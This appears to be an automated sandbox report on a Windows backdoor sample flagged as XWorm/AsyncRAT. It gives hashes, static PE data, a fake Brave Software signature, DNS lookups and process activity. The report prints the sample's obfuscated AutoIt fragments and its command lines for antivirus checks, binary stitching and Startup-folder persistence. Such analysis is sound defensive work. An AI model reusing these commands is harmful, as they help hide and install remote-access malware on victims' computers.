Process:	C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
File Type:	data
Category:	dropped
Size (bytes):	4184
Entropy (8bit):	7.6308247335047215
Encrypted:	false
SSDEEP:	96:VTOL+Q3IuzfJFFy4EDzHy5Xz+ppo+zAbQ6YhbBwGKGP5h3g:VC+Q3ISVSWMZMQ3rw
MD5:	3CBF1D6D00412611D1C10072A5608AE7
SHA1:	368A8A3592CC335ABA9E99E8C4BB716F5228DF49
SHA-256:	181C602909F69F5524318810AD257EEB3F8831E34F826E5DABF3A797DA1FFFED
SHA-512:	39FDB41CD9034F53F1A4E0863D8AD0C3AABB8F0B0F91B49DD51987DA6A71BF171302409C1F118FCEB7285AAAF816C977B8F432D616A5F05A8763142A5F352817
Malicious:	false
Preview:	....?.O5...7.R.%4...g....Iz.....)....].C.t.p(..{.......o....mV....>$.g&..........{.g..X...A..U.n...L.K..B.o...6.d.......f...!....#....4D....Ig....Z..f.3...%.qn.].L`<.....r....B.M.&.w...W...a.&...M.d.E...?T..v..lj.."\....).K...7t...f.4s..}\|^..=....P.m.W.~.7.k...........)0..%0...U...........0...U.......0.......0...U.........i...WE93..@...e.0...U.#..0....l..............gS.0>..+........2000...+.....0.."http://ocsp2.globalsign.com/rootr606..U.../0-0+.).'.%http://crl.globalsign.com/root-r6.crl0G..U. .@0>0<..U. .0402..+........&https://www.globalsign.com/repository/0....H................Wg+B_......(.V.L....p......:`3.9..k.@I%............A.O....#...K.$..D........Ve.......a.FH...gz..J.b....4HEU...J.^..r.qvp.....7W......8.X..~.n.&...*..Hdi/..r..$KtZ}r.5..W......L...SL.....IUOu..oJ..j....0N..s.^....}K.,..k...Y7..,.E..n.u....[/..=}..0...{\|...Q.....0.QV`.\|.="...$S'...H.',y.<.....>.J.!.b...0....H'\|.uB.k..k...X4...P..{...H.+U..% ..Q..c...lraJ..C..W..<

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Stream

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
File Type:	ASCII text, with very long lines (943), with CRLF line terminators
Category:	dropped
Size (bytes):	288768
Entropy (8bit):	5.191601948993769
Encrypted:	false
SSDEEP:	3072:TaDj35Gv5njzfd4eUvXoa8eaWn17DmlZ5Vw:TaDj35GRl4eYXp8eaEC5Vw
MD5:	545E573943B2D77F96AAF83A4C90468D
SHA1:	CA20A8FF17C84969B352ADFB2911C9C365C731DC
SHA-256:	66DBD0BD2AC4AE854AC15B01EF61265093DA7E4534DD630A5955D8879B155BC7
SHA-512:	700D03B06CDA42B07F97C238EC8E7C1CABDA1AEC1C85CBFB8D0145F67FD3DA9D0E4F11FF8C6AEAF24806600E9016366C4566C29CE05D2325802A045BE90C3F8C
Malicious:	false
Preview:	..Func BagsObserveLindsayRegistration($LPSYMANTEC, $LIMITATIONCONSPIRACYANNOTATEDBOND, $MANCHESTERVIEWINGACRE, $ExpandingTaiwan, $performtomatoletboring)..$GOVERNMENTDISTINCTION = '459283316547'..While 502..$preventingfixesexpanding = 429..Switch $preventingfixesexpanding..Case 428..Log(7223)..MemGetStats()..ObjGet(Controversial("83z107z103z121z123z120z107z115z107z116z122z121z100z76z107z114z114z117z125z100",7-1))..Floor(479)..PixelGetColor(Controversial("75z78z35z35z35z35z79z76z81z72z68z85z35z35z35z35",4-1), Controversial("75z78z35z35z35z35z79z76z81z72z68z85z35z35z35z35",4-1))..DirGetSize(Controversial("106z111z117z102z115z98z100z117z34z118z116z99z34z106z111z34z101z102z103z102z111z101z34",1-0))..Ceiling(9421)..ProgressOff()..$preventingfixesexpanding = $preventingfixesexpanding + 198328/198328..Case 429..$occursaluminiumnamely = Floor(382)..ExitLoop..Case 430..ObjGet(Controversial("70z81z89z80z78z81z67z70z34",2-0))..DirGetSize(Controversial("111z108z115z107z52z119z118z121z123z121z104z1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Tramadol

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
File Type:	data
Category:	dropped
Size (bytes):	46080
Entropy (8bit):	6.825887703010521
Encrypted:	false
SSDEEP:	768:c+9BGmd9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GH:c+9BGmdATGODv7xvTphAiPChgZ2kOEH
MD5:	CB0CF96099E0CD964CCC2003CE264D93
SHA1:	2D15DB969842A6B196336FB1BAF6CA38BE482A59
SHA-256:	520481555DD6940947DD602F3DB5A162BA0F7D8CB201C01EB4124FDF70645D88
SHA-512:	ADE03ECBBDFC1F99D5E364B2A2B5933A243709B1F73F3AAA77E5634115B32FD262026902CAB965B39438E7080E33EACDC45F8D8101AB95981A6E97A6F5B67B7B
Malicious:	false
Preview:	...............'...................................................................................................................(...................................................................................t...................................................................................................t...........................................................................................................................................................................................................................................................................................................k...................................................................k.......................................................................................................................................W.........................................W....................................................................................?................................................?..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" >), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	95
Entropy (8bit):	4.9119902196603284
Encrypted:	false
SSDEEP:	3:HRAbABGQaFyw3pYo0nacwRE2J5gxMLQK9n8zfy:HRYF5yjocNwi23gern8zfy
MD5:	D96773F48A1A7C708BB89865AE2C9B0D
SHA1:	F6615DDB6E67985D43EF286BA5339B6C2A45888E
SHA-256:	DAA97D2D532DA00B2614F33A0D9A08AC8417146A493ADCEEF4F7F40C1C26F695
SHA-512:	F67C0AA879B9346949544B464DFD2F0DE11C2C8B84A93FA2B75FF4947498C725D983CD029E902D1E2FD4150D2CA3981B61D6734F095D88C135942600A0F0108B
Malicious:	true
Preview:	[InternetShortcut] ..URL="C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" ..

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	2464
Entropy (8bit):	3.247458013443636
Encrypted:	false
SSDEEP:	24:QOaqdmuF3rVW+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIPVxZ:FaqdF7VW+AAHdKoqKFxcxkFfw
MD5:	5C8971C03F58B451BCDB44CB4896E96D
SHA1:	FF97CBF2DC1A939E23CE0336511D79AFD6966B8E
SHA-256:	1AC32F9C7681FE6112B36409250508735CA8904797D86B906545256AD2FFEDB7
SHA-512:	5C3D71475D303C3B3322ECB2A5F85EBFDFCC6D0329C9399EB62EEC331608EC4D2AD380820F6DA8FCFCC852E016F1A9507DDCA79B0EBC0B80736DDCDA79D727DB
Malicious:	false
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. M.a.r. .. 2.9. .. 2.0.2.4. .1.3.:.1.1.:.0.7.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e........................................ .W.S.C. .S.t.a.t.e. .I.n.f.o. ................................................................. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. ..............................d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	0.8352444090222729
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
File size:	10'515'536 bytes
MD5:	63b3dd980ac9a06fd167b0df8121c979
SHA1:	eb2737c8940e03d64c8b6e3ff59db07a1a1ec4a0
SHA256:	44d97e36a72d87c6b928ccc6ec05a80672bcbf65fc357e0e4ac20ecdd11e837e
SHA512:	8baabed3323abdbc172f4fe3fa107e12ff6296d0f86efa85ae76258a83a8102e6c50697478a0571692262dc7c24b56f6de8866e474a7d731ef0e559add018ea4
SSDEEP:	24576:L3BBo+T4XO1X9neVwSxGMOZycff+pTppi:bU+Th/MknAdW
TLSH:	D3B623808AA49825ED53AE720FE06B3B5E75BAE61CE2C8E32701B141DD777435E1E7D0
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L...h.Oa.................h....:....

File Icon


Icon Hash:	e0dcece4c4e47858

Static PE Info

General

Entrypoint:	0x40350a
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x614F9A68 [Sat Sep 25 21:53:44 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	56a78d55f3f7af51443e58e0ce2fb5f6

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	06/06/2023 02:00:00 08/08/2024 01:59:59
Subject Chain	CN="Brave Software, Inc.", O="Brave Software, Inc.", L=San Francisco, S=California, C=US
Version:	3
Thumbprint MD5:	16D12EA31FCCA2DB434A4CE2764212FB
Thumbprint SHA-1:	8903F2BD47465A4F0F080AA7CEEC31A31B74DE42
Thumbprint SHA-256:	9422AAD6EED2524B47A4E58D835AC34009EA3B76DD25155EFCCBD0CDB6C1EE88
Serial:	031543E76CA971575EEDF22AA3719DCC

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A2E0h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080CCh]
mov esi, dword ptr [004080D0h]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007F3CFD47658Ah
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007F3CFD47655Ah
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [007A8B18h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3b9000	0x6398	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xa00000	0x7450
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6670	0x6800	947cb8a43bf8f4be84b88dc77764312e	False	0.6679311899038461	data	6.436002641218711	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x139a	0x1400	691f0273dad50ec603f6fedf850b58ee	False	0.45	data	5.145774564074664	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x39eb78	0x600	69d435a1d4e9efa1d5d00d6c3645c91e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a9000	0x10000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3b9000	0x6398	0x6400	eb64a37b7d853d8f767ba985d207d8d9	False	0.6687109375	data	6.1069191723881255	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3b9220	0x2668	Device independent bitmap graphic, 48 x 96 x 32, image size 9792	English	United States	0.47874288039056145
RT_ICON	0x3bb888	0x1f7b	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.0013649336145924
RT_ICON	0x3bd808	0x1128	Device independent bitmap graphic, 32 x 64 x 32, image size 4352	English	United States	0.51775956284153
RT_ICON	0x3be930	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6604609929078015
RT_DIALOG	0x3bed98	0x100	data	English	United States	0.5234375
RT_DIALOG	0x3bee98	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x3befb8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x3bf018	0x3e	data	English	United States	0.8064516129032258
RT_MANIFEST	0x3bf058	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 29, 2024 11:38:12.744581938 CET	59016	53	192.168.2.7	1.1.1.1
Mar 29, 2024 11:38:12.879523993 CET	53	59016	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 29, 2024 11:38:12.744581938 CET	192.168.2.7	1.1.1.1	0xe3ec	Standard query (0)	sCMixbVNmKacbXAnMNdtVVILqF.sCMixbVNmKacbXAnMNdtVVILqF	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 29, 2024 11:38:12.879523993 CET	1.1.1.1	192.168.2.7	0xe3ec	Name error (3)	sCMixbVNmKacbXAnMNdtVVILqF.sCMixbVNmKacbXAnMNdtVVILqF	none	none	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	11:38:08
Start date:	29/03/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe"
Imagebase:	0x400000
File size:	10'515'536 bytes
MD5 hash:	63B3DD980AC9A06FD167B0DF8121C979
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:38:08
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:38:08
Start date:	29/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:38:09
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x850000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:38:09
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa.exe opssvc.exe"
Imagebase:	0x180000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:38:10
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x850000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:38:10
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Imagebase:	0x180000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:38:10
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 23855
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:38:10
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b Northeast + Cameras + Papers + Friends + Fears + Commander + Tramadol + Plugins 23855\Telecom.pif
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	11:38:10
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b Stream + Keyboard 23855\R
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	11:38:11
Start date:	29/03/2024
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif
Wow64 process (32bit):	true
Commandline:	23855\Telecom.pif 23855\R
Imagebase:	0x440000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000003.1477626000.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000003.1477626000.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000003.1475846355.0000000004544000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000003.1475846355.0000000004544000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000003.1475792127.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000003.1475792127.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000003.1477657336.000000000455C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000003.1477657336.000000000455C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.2443989987.0000000004514000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000002.2443989987.0000000004514000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000003.1477695668.000000000453D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000003.1477695668.000000000453D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.2443989987.0000000004526000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000002.2443989987.0000000004526000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 1%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	11:38:11
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping -n 5 127.0.0.1
Imagebase:	0xec0000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:38:11
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & echo URL="C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & exit
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	11:38:11
Start date:	29/03/2024
